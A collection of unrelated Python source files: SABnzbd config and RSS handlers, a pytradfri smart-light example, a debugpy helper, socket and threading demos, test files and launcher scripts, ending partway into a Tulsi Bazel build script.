job['skip'] = '*' * int(job.get('status', '').endswith('*'))
# These fields could be empty
job['cat'] = job.get('cat', '')
job['size'] = job.get('size', '')
job['infourl'] = job.get('infourl', '')
# Auto-fetched jobs didn't have these fields set
if job.get('url'):
job['baselink'] = get_base_url(job.get('url'))
if sabnzbd.rss.special_rss_site(job.get('url')):
job['nzbname'] = ''
else:
job['nzbname'] = xml_name(job['title'])
else:
job['baselink'] = ''
job['nzbname'] = xml_name(job['title'])
if job.get('size', 0):
job['size_units'] = to_units(job['size'])
else:
job['size_units'] = '-'
# And we add extra fields for sorting
if job.get('age', 0):
job['age_ms'] = time.mktime(job['age'].timetuple())
job['age'] = calc_age(job['age'], True)
else:
job['age_ms'] = ''
job['age'] = ''
if job.get('time_downloaded'):
job['time_downloaded_ms'] = time.mktime(job['time_downloaded'])
job['time_downloaded'] = time.strftime(time_format('%H:%M %a %d %b'), job['time_downloaded']).decode(codepage)
else:
job['time_downloaded_ms'] = ''
job['time_downloaded'] = ''
return job
jobs = sabnzbd.rss.show_result(feed).values()
good, bad, done = ([], [], [])
for job in jobs:
if job['status'][0] == 'G':
good.append(make_item(job))
elif job['status'][0] == 'B':
bad.append(make_item(job))
elif job['status'] == 'D':
done.append(make_item(job))
try:
# Sort based on actual age, in try-catch just to be sure
good.sort(key=lambda job: job['age_ms'], reverse=True)
bad.sort(key=lambda job: job['age_ms'], reverse=True)
done.sort(key=lambda job: job['time_downloaded_ms'], reverse=True)
except:
# Let the javascript do it then..
pass
return done, good, bad
##############################################################################
LIST_EMAIL = (
'email_endjob', 'email_cats', 'email_full',
'email_server', 'email_to', 'email_from',
'email_account', 'email_pwd', 'email_rss'
)
LIST_GROWL = ('growl_enable', 'growl_cats', 'growl_server', 'growl_password',
'growl_prio_startup', 'growl_prio_download', 'growl_prio_pp', 'growl_prio_complete', 'growl_prio_failed',
'growl_prio_disk_full', 'growl_prio_warning', 'growl_prio_error', 'growl_prio_queue_done', 'growl_prio_other',
'growl_prio_new_login')
LIST_NCENTER = ('ncenter_enable', 'ncenter_cats',
'ncenter_prio_startup', 'ncenter_prio_download', 'ncenter_prio_pp', 'ncenter_prio_complete', 'ncenter_prio_failed',
'ncenter_prio_disk_full', 'ncenter_prio_warning', 'ncenter_prio_error', 'ncenter_prio_queue_done', 'ncenter_prio_other',
'ncenter_prio_new_login')
LIST_ACENTER = ('acenter_enable', 'acenter_cats',
'acenter_prio_startup', 'acenter_prio_download', 'acenter_prio_pp', 'acenter_prio_complete', 'acenter_prio_failed',
'acenter_prio_disk_full', 'acenter_prio_warning', 'acenter_prio_error', 'acenter_prio_queue_done', 'acenter_prio_other',
'acenter_prio_new_login')
LIST_NTFOSD = ('ntfosd_enable', 'ntfosd_cats',
'ntfosd_prio_startup', 'ntfosd_prio_download', 'ntfosd_prio_pp', 'ntfosd_prio_complete', 'ntfosd_prio_failed',
'ntfosd_prio_disk_full', 'ntfosd_prio_warning', 'ntfosd_prio_error', 'ntfosd_prio_queue_done', 'ntfosd_prio_other',
'ntfosd_prio_new_login')
LIST_PROWL = ('prowl_enable', 'prowl_cats', 'prowl_apikey',
'prowl_prio_startup', 'prowl_prio_download', 'prowl_prio_pp', 'prowl_prio_complete', 'prowl_prio_failed',
'prowl_prio_disk_full', 'prowl_prio_warning', 'prowl_prio_error', 'prowl_prio_queue_done', 'prowl_prio_other',
'prowl_prio_new_login')
LIST_PUSHOVER = ('pushover_enable', 'pushover_cats', 'pushover_token', 'pushover_userkey', 'pushover_device',
'pushover_prio_startup', 'pushover_prio_download', 'pushover_prio_pp', 'pushover_prio_complete', 'pushover_prio_failed',
'pushover_prio_disk_full', 'pushover_prio_warning', 'pushover_prio_error', 'pushover_prio_queue_done', 'pushover_prio_other',
'pushover_prio_new_login', 'pushover_emergency_retry', 'pushover_emergency_expire')
LIST_PUSHBULLET = ('pushbullet_enable', 'pushbullet_cats', 'pushbullet_apikey', 'pushbullet_device',
'pushbullet_prio_startup', 'pushbullet_prio_download', 'pushbullet_prio_pp', 'pushbullet_prio_complete', 'pushbullet_prio_failed',
'pushbullet_prio_disk_full', 'pushbullet_prio_warning', 'pushbullet_prio_error', 'pushbullet_prio_queue_done', 'pushbullet_prio_other',
'pushbullet_prio_new_login')
LIST_NSCRIPT = ('nscript_enable', 'nscript_cats', 'nscript_script', 'nscript_parameters',
'nscript_prio_startup', 'nscript_prio_download', 'nscript_prio_pp', 'nscript_prio_complete', 'nscript_prio_failed',
'nscript_prio_disk_full', 'nscript_prio_warning', 'nscript_prio_error', 'nscript_prio_queue_done', 'nscript_prio_other',
'nscript_prio_new_login')
class ConfigNotify(object):
def __init__(self, root):
self.__root = root
self.__lastmail = None
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['categories'] = list_cats(False)
conf['lastmail'] = self.__lastmail
conf['have_growl'] = True
conf['have_ntfosd'] = sabnzbd.notifier.have_ntfosd()
conf['have_ncenter'] = sabnzbd.DARWIN and bool(sabnzbd.notifier.ncenter_path())
conf['scripts'] = list_scripts(default=False, none=True)
for kw in LIST_EMAIL:
conf[kw] = config.get_config('misc', kw).get_string()
for kw in LIST_GROWL:
try:
conf[kw] = config.get_config('growl', kw)()
except:
logging.debug('MISSING KW=%s', kw)
for kw in LIST_PROWL:
conf[kw] = config.get_config('prowl', kw)()
for kw in LIST_PUSHOVER:
conf[kw] = config.get_config('pushover', kw)()
for kw in LIST_PUSHBULLET:
conf[kw] = config.get_config('pushbullet', kw)()
for kw in LIST_NCENTER:
conf[kw] = config.get_config('ncenter', kw)()
for kw in LIST_ACENTER:
conf[kw] = config.get_config('acenter', kw)()
for kw in LIST_NTFOSD:
conf[kw] = config.get_config('ntfosd', kw)()
for kw in LIST_NSCRIPT:
conf[kw] = config.get_config('nscript', kw)()
conf['notify_keys'] = sabnzbd.constants.NOTIFY_KEYS
conf['notify_texts'] = sabnzbd.notifier.NOTIFICATION
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_notify.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveEmail(self, **kwargs):
ajax = kwargs.get('ajax')
for kw in LIST_EMAIL:
msg = config.get_config('misc', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_GROWL:
msg = config.get_config('growl', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NCENTER:
msg = config.get_config('ncenter', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_ACENTER:
msg = config.get_config('acenter', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NTFOSD:
msg = config.get_config('ntfosd', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PROWL:
msg = config.get_config('prowl', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PUSHOVER:
msg = config.get_config('pushover', kw).set(platform_encode(kwargs.get(kw)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_PUSHBULLET:
msg = config.get_config('pushbullet', kw).set(platform_encode(kwargs.get(kw, 0)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
for kw in LIST_NSCRIPT:
msg = config.get_config('nscript', kw).set(platform_encode(kwargs.get(kw, 0)))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, unicoder(msg)), ajax)
config.save_config()
self.__lastmail = None
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testmail(self, **kwargs):
self.__lastmail = _api_test_email(name=None, output=None, kwargs=None)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testnotification(self, **kwargs):
_api_test_notif(name=None, output=None, kwargs=None)
raise Raiser(self.__root)
def rss_history(url, limit=50, search=None):
url = url.replace('rss', '')
youngest = None
rss = RSS()
rss.channel.title = "SABnzbd History"
rss.channel.description = "Overview of completed downloads"
rss.channel.link = "https://sabnzbd.org/"
rss.channel.language = "en"
items, _fetched_items, _max_items = build_history(limit=limit, search=search)
for history in items:
item = Item()
item.pubDate = std_time(history['completed'])
item.title = history['name']
if not youngest:
youngest = history['completed']
elif history['completed'] < youngest:
youngest = history['completed']
if history['url_info']:
item.link = history['url_info']
else:
item.link = url
item.guid = history['nzo_id']
stageLine = []
for stage in history['stage_log']:
stageLine.append("<tr><dt>Stage %s</dt>" % stage['name'])
actions = []
for action in stage['actions']:
actions.append("<dd>%s</dd>" % action)
actions.sort()
actions.reverse()
for act in actions:
stageLine.append(act)
stageLine.append("</tr>")
item.description = ''.join(stageLine)
rss.addItem(item)
rss.channel.lastBuildDate = std_time(youngest)
rss.channel.pubDate = std_time(time.time())
return rss.write()
def rss_warnings():
""" Return an RSS feed with last warnings/errors """
rss = RSS()
rss.channel.title = "SABnzbd Warnings"
rss.channel.description = "Overview of warnings/errors"
rss.channel.link = "https://sabnzbd.org/"
rss.channel.language = "en"
for warn in sabnzbd.GUIHANDLER.content():
item = Item()
item.title = warn
rss.addItem(item)
rss.channel.lastBuildDate = std_time(time.time())
rss.channel.pubDate = rss.channel.lastBuildDate
return rss.write()
|
example_sync.py
|
#!/usr/bin/env python3
"""
This is an example of how the pytradfri-library can be used sync.
To run the script, do the following:
$ pip3 install pytradfri
$ Download this file (example_sync.py)
$ python3 example_sync.py <IP>
Where <IP> is the address to your IKEA gateway. The first time
running you will be asked to input the 'Security Code' found on
the back of your IKEA gateway.
"""
# Hack to allow relative import above top level package
import sys
import os
folder = os.path.dirname(os.path.abspath(__file__)) # noqa
sys.path.insert(0, os.path.normpath("%s/.." % folder)) # noqa
from pytradfri import Gateway
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.error import PytradfriError
from pytradfri.util import load_json, save_json
import uuid
import argparse
import threading
import time
CONFIG_FILE = "tradfri_standalone_psk.conf"
parser = argparse.ArgumentParser()
parser.add_argument(
"host", metavar="IP", type=str, help="IP Address of your Tradfri gateway"
)
parser.add_argument(
"-K",
"--key",
dest="key",
required=False,
help="Security code found on your Tradfri gateway",
)
args = parser.parse_args()
if args.host not in load_json(CONFIG_FILE) and args.key is None:
print(
"Please provide the 'Security Code' on the back of your " "Tradfri gateway:",
end=" ",
)
key = input().strip()
if len(key) != 16:
raise PytradfriError("Invalid 'Security Code' provided.")
else:
args.key = key
def run():
# Assign configuration variables.
# The configuration check takes care they are present.
conf = load_json(CONFIG_FILE)
try:
identity = conf[args.host].get("identity")
psk = conf[args.host].get("key")
api_factory = APIFactory(host=args.host, psk_id=identity, psk=psk)
except KeyError:
identity = uuid.uuid4().hex
api_factory = APIFactory(host=args.host, psk_id=identity)
try:
psk = api_factory.generate_psk(args.key)
print("Generated PSK: ", psk)
conf[args.host] = {"identity": identity, "key": psk}
save_json(CONFIG_FILE, conf)
except AttributeError:
raise PytradfriError(
"Please provide the 'Security Code' on the "
"back of your Tradfri gateway using the "
"-K flag."
)
api = api_factory.request
gateway = Gateway()
devices_command = gateway.get_devices()
devices_commands = api(devices_command)
devices = api(devices_commands)
lights = [dev for dev in devices if dev.has_light_control]
# Print all lights
print(lights)
# Lights can be accessed by index, so lights[1] is the second light
if lights:
light = lights[0]
else:
print("No lights found!")
light = None
if light:
# Example 1: checks state of the light (true=on)
print("Is on:", light.light_control.lights[0].state)
# Example 2: get dimmer level of the light
print("Dimmer:", light.light_control.lights[0].dimmer)
# Example 3: What is the name of the light
print("Name:", light.name)
# Example 4: Set the light level of the light
dim_command = light.light_control.set_dimmer(254)
api(dim_command)
# Example 5: Change color of the light
# f5faf6 = cold | f1e0b5 = normal | efd275 = warm
color_command = light.light_control.set_hex_color("efd275")
api(color_command)
# Get all blinds
blinds = [dev for dev in devices if dev.has_blind_control]
# Print all blinds
print(blinds)
if blinds:
blind = blinds[0]
else:
print("No blinds found!")
blind = None
if blind:
blind_command = blinds[0].blind_control.set_state(50)
api(blind_command)
tasks_command = gateway.get_smart_tasks()
tasks_commands = api(tasks_command)
tasks = api(tasks_commands)
# Example 6: Return the transition time (in minutes) for task#1
if tasks:
print(tasks[0].task_control.tasks[0].transition_time)
# Example 7: Set the dimmer stop value to 30 for light#1 in task#1
dim_command_2 = tasks[0].start_action.devices[0].item_controller.set_dimmer(30)
api(dim_command_2)
if light:
def observe_callback(updated_device):
light = updated_device.light_control.lights[0]
print("Received message for: %s" % light)
def observe_err_callback(err):
print("observe error:", err)
def worker(light):
api(light.observe(observe_callback, observe_err_callback, duration=120))
for light in lights:
threading.Thread(target=worker, args=(light,), daemon=True).start()
print("Sleeping for 2 min to listen for more observation events")
print("Try altering any light in the app, and watch the events!")
time.sleep(120)
run()
|
_debugpy.py
|
"""Tools to enable debugpy attachment to a process."""
import threading
import debugpy
import portpicker
_dap_port = None
def enable_attach_async():
"""Enable a debugger to attach to this process.
Returns:
The debug adapter port which can be connected to using the Debug Adapter
Proxy protocol.
"""
global _dap_port
if _dap_port:
return _dap_port
# Changes here should be reflected in our internal debugpy config.
debugpy.configure({
# We don't use qt, so we disable support to avoid spurious imports.
'qt': 'none',
# b/180567283: Disable monkey patching subprocess calls which isn't
# needed for Colab and can cause issues.
'subProcess': False,
})
_dap_port = portpicker.pick_unused_port()
main_thread = threading.current_thread()
# Prevent debugpy from tracing the current thread.
main_thread.pydev_do_not_trace = True
def attachment_entry():
# The client will retry the connection a few times to avoid the inherent
# raciness of this.
debugpy.listen(_dap_port)
# Debugger tracing isn't needed for just tracebacks, but if full debugging
# is needed then it needs to be re-enabled while debugging.
# We want to use `pydevd.stoptrace` but if this is called before we have
# connected to the debug adapter from the client then it'll send a
# terminate to the adapter and the adapter will auto-exit before we can
# connect to it. After the connection then it's OK to terminate since the
# adapter will not close while there are active connections.
threading.settrace(None) # for all future threads
try:
# Stop debugpy from tracing newly created threads.
from _pydev_bundle import pydev_monkey # pylint: disable=g-import-not-at-top
pydev_monkey.undo_patch_thread_modules()
except ModuleNotFoundError:
# _pydev_bundle may be vendored into either location.
from debugpy.third_party.pydevd._pydev_bundle import pydev_monkey # pylint: disable=g-import-not-at-top
pydev_monkey.undo_patch_thread_modules()
# Clear the trace flag to allow fetching stack traces.
main_thread.pydev_do_not_trace = False
# debugpy.listen will spin up another process then start listening for
# connections from that process. This can take a second or so, but most of it
# is not by this process. Doing this on a separate thread reduces the impact
# on kernel initialization.
threading.Thread(target=attachment_entry).start()
return _dap_port
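# Minimal usage sketch (hypothetical caller; the port value is whatever portpicker returns):
#
#   from _debugpy import enable_attach_async
#   port = enable_attach_async()   # returns immediately; listener starts on a background thread
#   print('Attach a DAP client to 127.0.0.1:%d' % port)
#
# Repeated calls return the same cached port (_dap_port), so calling it more than once is safe.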
|
thread-spinner.py
|
import threading
import itertools
import sys
import time
class Signal:
go = True
def spin(msg, signal):
write, flush = sys.stdout.write, sys.stdout.flush
for char in itertools.cycle('|/-\\'):
status = msg + ' ' + char
write(status)
flush()
write('\x08' * len(status))
time.sleep(.1)
if not signal.go:
break
write(' ' * len(status) + '\x08' * len(status))
def slow_function():
time.sleep(10)
return 42
def supervisor():
signal = Signal()
spinner = threading.Thread(target=spin, args=('thinking!', signal))
print('spinner object:', spinner)
spinner.start()
result = slow_function()
signal.go = False
spinner.join()
return result
def main():
result = supervisor()
print('Answer:', result)
if __name__ == '__main__':
main()
|
test_ipc_log_listener.py
|
import tempfile
import logging
from multiprocessing import Process
from pathlib import Path
import uuid
import pytest
from trinity._utils.logging import IPCListener, IPCHandler
@pytest.fixture
def ipc_path():
with tempfile.TemporaryDirectory() as dir:
yield Path(dir) / "logging.ipc"
def test_queued_logging(ipc_path):
class HandlerForTest(logging.Handler):
def __init__(self):
self.logs = []
super().__init__()
def handle(self, record):
self.logs.append(record)
def do_other_process_logging(ipc_path):
queue_handler = IPCHandler.connect(ipc_path)
queue_handler.setLevel(logging.DEBUG)
logger = logging.getLogger(str(uuid.uuid4()))
logger.addHandler(queue_handler)
logger.setLevel(logging.DEBUG)
logger.error('error log')
logger.info('info log')
logger.debug('debug log')
queue_handler.close()
proc = Process(target=do_other_process_logging, args=(ipc_path,))
logger = logging.getLogger(str(uuid.uuid4()))
handler = HandlerForTest()
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
queue_listener = IPCListener(handler)
with queue_listener.run(ipc_path):
assert len(handler.logs) == 0
proc.start()
proc.join()
assert len(handler.logs) == 3
error_log, info_log, debug_log = handler.logs
assert 'error log' in error_log.message
assert 'info log' in info_log.message
assert 'debug log' in debug_log.message
|
socketServer.py
|
import logging
import sys
import SocketServer
import time
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class EchoRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('EchoRequestHandler')
self.logger.debug('__init__')
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
return
def setup(self):
self.logger.debug('setup')
return SocketServer.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
# Echo the data back to the client
data = self.request.recv(1024)
self.logger.debug('recv()->"%s"', data)
self.request.send(data)
return
def finish(self):
self.logger.debug('finish')
return SocketServer.BaseRequestHandler.finish(self)
class EchoServer(SocketServer.TCPServer):
def __init__(self, server_address, handler_class=EchoRequestHandler):
self.logger = logging.getLogger('EchoServer')
self.logger.debug('__init__')
SocketServer.TCPServer.__init__(self, server_address, handler_class)
return
def server_activate(self):
self.logger.debug('server_activate')
SocketServer.TCPServer.server_activate(self)
return
def serve_forever(self):
self.logger.debug('waiting for request')
self.logger.info('Handling requests, press <Ctrl-C> to quit')
while True:
self.handle_request()
return
def handle_request(self):
self.logger.debug('handle_request')
return SocketServer.TCPServer.handle_request(self)
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.verify_request(self, request, client_address)
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.process_request(self, request, client_address)
def server_close(self):
self.logger.debug('server_close')
return SocketServer.TCPServer.server_close(self)
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.finish_request(self, request, client_address)
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
return SocketServer.TCPServer.close_request(self, request_address)
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel give us a port
server = EchoServer(address, EchoRequestHandler)
ip, port = server.server_address # find out what port we were given
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
while True:
time.sleep(1000)
## logger = logging.getLogger('client')
## logger.info('Server on %s:%s', ip, port)
##
## # Connect to the server
## logger.debug('creating socket')
## s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
## logger.debug('connecting to server')
## s.connect((ip, port))
##
## # Send the data
## message = 'Hello, world'
## logger.debug('sending data: "%s"', message)
## len_sent = s.send(message)
##
## # Receive a response
## logger.debug('waiting for response')
## response = s.recv(len_sent)
## logger.debug('response from server: "%s"', response)
##
## # Clean up
## logger.debug('closing socket')
## s.close()
## logger.debug('done')
## server.socket.close()
|
photo.py
|
import os
import tempfile
import threading
from gi.repository import Gdk
from rawkit.options import Options
from rawkit.raw import Raw
class AutoUpdatingOptions(Options):
"""
A set of options that update the photo when they are updated.
"""
def __init__(self, attrs=None, photo=None):
super().__init__(attrs=attrs)
self.photo = photo
def __setattr__(self, name, value):
try:
Options.__setattr__(self, name, value)
self.update()
except AttributeError:
self.__dict__[name] = value
def update(self):
"""
Updates the photo which contains these options.
"""
if self.photo is not None:
self.photo.update()
class Photo(Raw):
"""
A photo comprises a raw file which can be edited and will update the
associated preview window (if any).
"""
def __init__(self, filename=None, ui_thread=None):
super().__init__(filename=filename)
(self.fhandle, self.tempfile) = tempfile.mkstemp()
self.filename = filename
self.ui_thread = ui_thread
self._closed = False
if self.ui_thread is not None:
self.update()
self.show()
def __setattr__(self, name, value):
if name == 'options' and type(value) is Options:
self.__dict__['options'] = AutoUpdatingOptions(
attrs=dict(zip(
value.keys(),
value.values()
)),
photo=self
)
try:
self.update()
except AttributeError:
pass
else:
Raw.__setattr__(self, name, value)
def show(self):
"""
Show the preview window.
"""
try:
Gdk.threads_enter()
self.preview = self.ui_thread.open_window(
self.tempfile,
rawfile=self.filename
)
finally:
Gdk.threads_leave()
def _update(self):
try:
Gdk.threads_enter()
self.save(filename=self.tempfile, filetype='ppm')
self.preview.render_photo(filename=self.tempfile)
except AttributeError:
pass
finally:
Gdk.threads_leave()
def update(self):
"""
Updates the photo on disk and in the preview pane.
"""
t = threading.Thread(target=self._update)
t.daemon = True
t.start()
@property
def closed(self):
return self._closed
def close(self):
"""
Cleans up the underlying raw file and unlinks any temp files.
"""
if not self.closed:
super().close()
os.unlink(self.tempfile)
self.preview.close()
self._closed = True
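# Usage sketch (hypothetical filename and ui_thread; both normally come from the
# surrounding application, and the option name assumes a standard rawkit Options attribute):
#
#   photo = Photo(filename='example.CR2', ui_thread=ui_thread)  # renders and shows a preview
#   photo.options.brightness = 2.0   # any option change triggers photo.update() in a thread
#   photo.close()                    # closes the preview and unlinks the temp PPM file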
|
run.py
|
import os
import sys
import argparse
import time
import multiprocessing
import platform
from fHDHR import fHDHR_VERSION, fHDHR_OBJ
import fHDHR.exceptions
import fHDHR.config
from fHDHR.http import fHDHR_HTTP_Server
from fHDHR.db import fHDHRdb
ERR_CODE = 1
ERR_CODE_NO_RESTART = 2
if sys.version_info.major == 2 or sys.version_info < (3, 7):
print('Error: fHDHR requires python 3.7+.')
sys.exit(1)
opersystem = platform.system()
if opersystem in ["Windows"]:
print("WARNING: This script may fail on Windows.")
def build_args_parser():
"""Build argument parser for fHDHR"""
parser = argparse.ArgumentParser(description='fHDHR')
parser.add_argument('-c', '--config', dest='cfg', type=str, required=True, help='configuration file to load.')
return parser.parse_args()
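# Example invocation (path is illustrative):
#   python run.py --config /path/to/config.ini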
def get_configuration(args, script_dir):
if not os.path.isfile(args.cfg):
raise fHDHR.exceptions.ConfigurationNotFound(filename=args.cfg)
return fHDHR.config.Config(args.cfg, script_dir)
def run(settings, logger, db):
fhdhr = fHDHR_OBJ(settings, logger, db)
fhdhrweb = fHDHR_HTTP_Server(fhdhr)
# Ensure spawn on Windows instead of fork
if settings.dict["main"]["opersystem"] in ["Windows"]:
multiprocessing.set_start_method('spawn')
try:
print("HTTP Server Starting")
fhdhr_web = multiprocessing.Process(target=fhdhrweb.run)
fhdhr_web.start()
if settings.dict["fhdhr"]["discovery_address"]:
print("SSDP Server Starting")
fhdhr_ssdp = multiprocessing.Process(target=fhdhr.device.ssdp.run)
fhdhr_ssdp.start()
if settings.dict["epg"]["method"]:
print("EPG Update Starting")
fhdhr_epg = multiprocessing.Process(target=fhdhr.device.epg.run)
fhdhr_epg.start()
# wait forever
while True:
time.sleep(3600)
except KeyboardInterrupt:
return ERR_CODE_NO_RESTART
return ERR_CODE
def start(args, script_dir):
"""Get Configuration for fHDHR and start"""
try:
settings = get_configuration(args, script_dir)
except fHDHR.exceptions.ConfigurationError as e:
print(e)
return ERR_CODE_NO_RESTART
logger = settings.logging_setup()
db = fHDHRdb(settings)
return run(settings, logger, db)
def main(script_dir):
"""fHDHR run script entry point"""
print("Loading fHDHR " + fHDHR_VERSION)
try:
args = build_args_parser()
return start(args, script_dir)
except KeyboardInterrupt:
print("\n\nInterrupted")
return ERR_CODE
if __name__ == '__main__':
    sys.exit(main(os.path.dirname(os.path.abspath(__file__))))
|
middleware.py
|
from multiprocessing import Process, Queue
import requests
import gevent
def child_process(queue):
while True:
print(queue.get())
requests.get('http://requestb.in/15s95oz1')
class GunicornSubProcessTestMiddleware(object):
def __init__(self):
super(GunicornSubProcessTestMiddleware, self).__init__()
self.queue = Queue()
self.process = Process(target=child_process, args=(self.queue,))
self.process.start()
def process_request(self, request):
self.queue.put(('REQUEST',))
def process_response(self, request, response):
self.queue.put(('RESPONSE',response.status_code))
return response
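# For reference, this middleware would be enabled by adding its dotted path to
# the Django middleware setting, e.g. (module path illustrative; old-style
# MIDDLEWARE_CLASSES shown since the class does not accept get_response):
#   MIDDLEWARE_CLASSES += ('myapp.middleware.GunicornSubProcessTestMiddleware',)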
|
eqpay_transaction_receipt_origin_contract_address.py
|
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
import threading
def waitforlogs(node, contract_address):
logs = node.cli.waitforlogs(node.cli.getblockcount()-1, COINBASE_MATURITY+500, '{"addresses": ["'+contract_address+'"]}')
node.result = logs
class EqPayTransactionReceiptOriginContractAddressTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-logevents', '-txindex']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.node = self.nodes[0]
self.nodes[0].generate(10 + COINBASE_MATURITY)
"""
pragma solidity ^0.5.2;
contract Test {
event TestEvent();
address private child;
function setChildContract(address childContractAddress) external {
child = childContractAddress;
}
function doEvent() external {
if(child == address(0x0)) {
emit TestEvent();
} else {
Test(child).doEvent();
}
}
function getChildAddress() public view returns(address) {
return child;
}
}
"""
"""
Function signatures:
afd67ce7: doEvent()
bcb1c3a9: getChildAddress()
f8d86e18: setChildContract(address)
"""
# Set up a chain of 10 contracts that reference their child contract. I.e. the tenth contract is the leaf
contracts = []
contract_bytecode = "608060405234801561001057600080fd5b506102b8806100206000396000f3fe608060405234801561001057600080fd5b506004361061005e576000357c010000000000000000000000000000000000000000000000000000000090048063afd67ce714610063578063bcb1c3a91461006d578063f8d86e18146100b7575b600080fd5b61006b6100fb565b005b610075610220565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b6100f9600480360360208110156100cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610249565b005b600073ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610182577f24ec1d3ff24c2f6ff210738839dbc339cd45a5294d85c79361016243157aae7b60405160405180910390a161021e565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663afd67ce76040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15801561020757600080fd5b5060325a03f115801561021957600080fd5b505050505b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505056fea165627a7a723058203cf61a18e40f6e2bd01b2f7bd607c6e6aff032f12bd5e3eca68212d2e2c80dbf0029"
for i in range(10):
contracts.append(self.nodes[0].createcontract(contract_bytecode)['address'])
self.node.generate(1)
if len(contracts) > 1:
self.node.sendtocontract(contracts[-2], "f8d86e18" + (contracts[-1].zfill(64)), 0, 1000000)
self.node.generate(1)
        # Run the doEvent function recursively, starting at the root contract, and make sure that no event entries are returned by waitforlogs for the first 9 contracts
for contract_address in contracts[:-1]:
thread = threading.Thread(target=waitforlogs, args=(self.node, contract_address))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 0)
# Do the same thing again but make sure that the event triggers for the "leaf" (10th) contract
thread = threading.Thread(target=waitforlogs, args=(self.node, contracts[-1]))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 1)
if __name__ == '__main__':
EqPayTransactionReceiptOriginContractAddressTest().main()
|
bazel_build.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2016 The Tulsi Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bridge between Xcode and Bazel for the "build" action."""
import atexit
import errno
import fcntl
import inspect
import io
import json
import os
import pipes
import re
import shutil
import signal
import subprocess
import sys
import textwrap
import threading
import time
import zipfile
from apfs_clone_copy import CopyOnWrite
import bazel_build_events
import bazel_build_settings
import bazel_options
from bootstrap_lldbinit import BootstrapLLDBInit
from bootstrap_lldbinit import TULSI_LLDBINIT_FILE
import tulsi_logging
from update_symbol_cache import UpdateSymbolCache
# List of frameworks that Xcode injects into test host targets that should be
# re-signed when running the tests on devices.
